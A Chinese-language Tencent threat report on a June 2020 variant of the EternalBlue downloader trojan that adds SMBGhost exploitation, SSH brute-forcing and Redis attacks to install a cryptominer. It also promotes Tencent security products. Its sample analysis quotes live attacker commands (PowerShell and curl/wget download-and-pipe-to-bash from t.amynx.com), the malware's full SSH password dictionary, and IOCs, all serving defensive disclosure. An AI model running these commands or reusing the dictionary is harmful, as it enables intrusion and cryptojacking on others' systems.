“黑球”行动再升级，SMBGhost漏洞攻击进入实战

腾讯电脑管家

首发专栏：腾讯电脑管家关注

2020年6月10日，腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击，之前的若干种病毒只是利用SMBGhost漏洞做扫描检测，并无实质性攻击利用。

一、背景

2020年6月10日，腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击，之前的若干种病毒只是利用SMBGhost漏洞做扫描检测，并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。

由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限，可直接攻击SMB服务造成RCE（远程代码执行），存在漏洞的计算机只要联网就可能被黑客探测攻击，并获得系统最高权限。使得木马针对Windows系统的攻击威力再次增强。

腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示，至今仍有近三分之一的系统未修补该漏洞，我们再次强烈建议所有用户尽快修补SMBGhost漏洞（CVE-2020-0796）。

此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击，在失陷系统创建定时任务并植入挖矿木马功能，使得其攻击的范围继续扩大，包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马，并会按照惯例在开始挖矿前，清除其他挖矿木马，以便独占系统资源。挖矿活动会大量消耗企业服务器资源，使正常业务受严重影响。

腾讯安全系列产品应对永恒之蓝下载器木马的响应清单：

应用场景	安全产品	解决方案
威胁情报	腾讯T-Sec 威胁情报云查服务（SaaS）	1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
威胁情报	腾讯T-Sec 高级威胁追溯系统	1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts
云原生安全防护	腾讯T-Sec 安全运营中心（云SOC）	基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html
	腾讯T-Sec 网络资产风险监测系统（腾讯御知）	1）腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2）已集成无损检测POC，企业可以对自身资产进行远程检测。关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://s.tencent.com/product/narms/index.html
	云防火墙（Cloud Firewall，CFW）	基于网络流量进行威胁检测与主动拦截，已支持： 1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测； 2）支持下发访问控制规则封禁目标端口，主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw
	腾讯T-Sec 主机安全（Cloud Workload Protection，CWP）	1）云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测； 2）已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp
非云企业安全防护	腾讯T-Sec 高级威胁检测系统（腾讯御界）	基于网络流量进行威胁检测，已支持： 1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测； 2）对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测；关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta
非云企业安全防护	腾讯T-Sec终端安全管理系统（御点）	1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序； 2）企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3）企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序；腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html

更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/

二、样本分析

攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击，攻击成功后远程执行以下shellcode:

powershell IEx(New-ObjectNet.WebClient).DownLoadString(”http[:]///t.amynx.com/smgho.jsp?0.8*%computername%”)

发起针对Linux服务器的攻击：

1、利用SSH爆破

扫描22端口进行探测，针对Linux系统root用户，尝试利用弱密码进行爆破连接，爆破使用密码字典：

“saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,”",”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta”

爆破登陆成功后执行远程命令：

Src=ssho;(curl -fsSLhttp[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O-http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash

2、利用Redis未授权访问漏洞

扫描6379端口进行探测，在函数redisexec中尝试连接未设置密码的redis服务器，访问成功后执行远程命令：export src=rdso;curl-fsSL t.amynx.com/ln/core.png?rdso|bash

SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png，该脚本主要有以下功能：

1、创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp

2、创建crontab定时启动Linux平台挖矿木马/.Xll/xr

通过定时任务执行的a.asp首先会清除竞品挖矿木马：

然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP，重新与该机器建立连接进行内网扩散攻击：

创建目录/.Xll并下载挖矿木马（d[.]ackng.com/ln/xr.zip）到该目录下，解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。

永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态，目前该木马会通过以下方法进行扩散传播：

漏洞利用	弱口令爆破	感染可移动设备	鱼叉攻击
“永恒之蓝”漏洞利用MS17-010	$IPC爆破	通过U盘、网络共享盘	以新冠肺炎等多种主题
Lnk漏洞利用CVE-2017-8464	SMB爆破	创建带漏洞lnk文件、js文件	DOC漏洞文档、js文件诱饵
Office漏洞利用CVE-2017-8570	MS SQL爆破
SMBGhost漏洞利用CVE-2020-0796	RDP爆破
Redis未授权访问漏洞(针对Linux)	SSH爆破(针对Linux)

截止2020年6月12日，永恒之蓝木马下载器家族主要版本更新功能列表如下：

2018年12月14日	利用“驱动人生”系列软件升级通道下载，利用“永恒之蓝”漏洞攻击传播。
2018年12月19日	下载之后的木马新增Powershell后门安装。
2019年1月9日	检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。
2019年1月24日	木马将挖矿组件、升级后门组件分别安装为计划任务，并同时安装Powershell后门。
2019年1月25日	木马在1月24日的基础上再次更新，将攻击组件安装为计划任务，在攻击时新增利用mimikatz搜集登录密码，SMB弱口令爆破攻击，同时安装Powershell计划任务和hta计划任务。
2019年2月10日	将攻击模块打包方式改为Pyinstaller。
2019年2月20日	更新矿机组件，下载释放XMRig矿机，以独立进程启动挖矿。
2019年2月23日	攻击方法再次更新，新增MsSQL爆破攻击。
2019年2月25日	在2月23日基础上继续更新，更新MsSQL爆破攻击时密码字典，添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击。
2019年3月6日	通过已感染机器后门更新Powershell脚本横向传播模块ipc。
2019年3月8日	通过已感染机器后门更新PE文件横向传播模块ii.exe，采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。
2019年3月14日	通过后门更新增肥木马大小、生成随机文件MD5逃避查杀，将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。
2019年3月28日	更新无文件攻击模块，更后新的攻击方式为：永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec，并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。
2019年4月3日	开创无文件挖矿新模式：挖矿脚本由PowerShell下载在内存中执行。
2019年7月19日	无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击，感染启动盘和网络共享盘，新增MsSQL爆破攻击。
2019年10月9日	新增Bluekeep漏洞CVE-2019-0708检测上报功能。
2020年2月12日	使用DGA域名，篡改hosts文件。
2020年4月3日	新增钓鱼邮件传播，邮件附件urgent.doc包含Office漏洞CVE-2017-8570。
2020年4月17日	钓鱼邮件新增附件readme.zip、readme.doc，新增Bypass UAC模块7p.php，创建readme.js文件感染可移动盘、网络共享盘
2020年5月21日	新增SMBGhost漏洞CVE-2020-0796检测上报功能，新增SSH爆破代码（未调用）。
2020年6月10日	新增SMBGhost漏洞CVE-2020-0796利用攻击，新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。

IOCs

Domain

t.amynx.com

t.zer9g.com

t.zz3r0.com

d.ackng.com

URL

http[:]//t.amynx.com/smgh.jsp

http[:]//t.amynx.com/a.jsp

http[:]//t.amynx.com/ln/a.asp

http[:]//t.amynx.com/ln/core.png

http[:]//d.ackng.com/if.bin

http[:]//d.ackng.com/smgh.bin

http[:]//d.ackng.com/ln/xr.zip

Md5

if.bin	99ecca08236f6cf766d7d8e2cc34eff6
xr.zip	2977084f9ce3e9e2d356adaf2b5bdcfd
core.png	17703523f5137bc0755a7e4f133fc9d3
a.asp	8b0cb7a0760e022564465e50ce3271bb
smgh.bin	5b3c44***3c7e592e416f68d3924620f

参考链接：

永恒之蓝木马下载器发起“黑球”行动，新增SMBGhost漏洞检测能力

https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ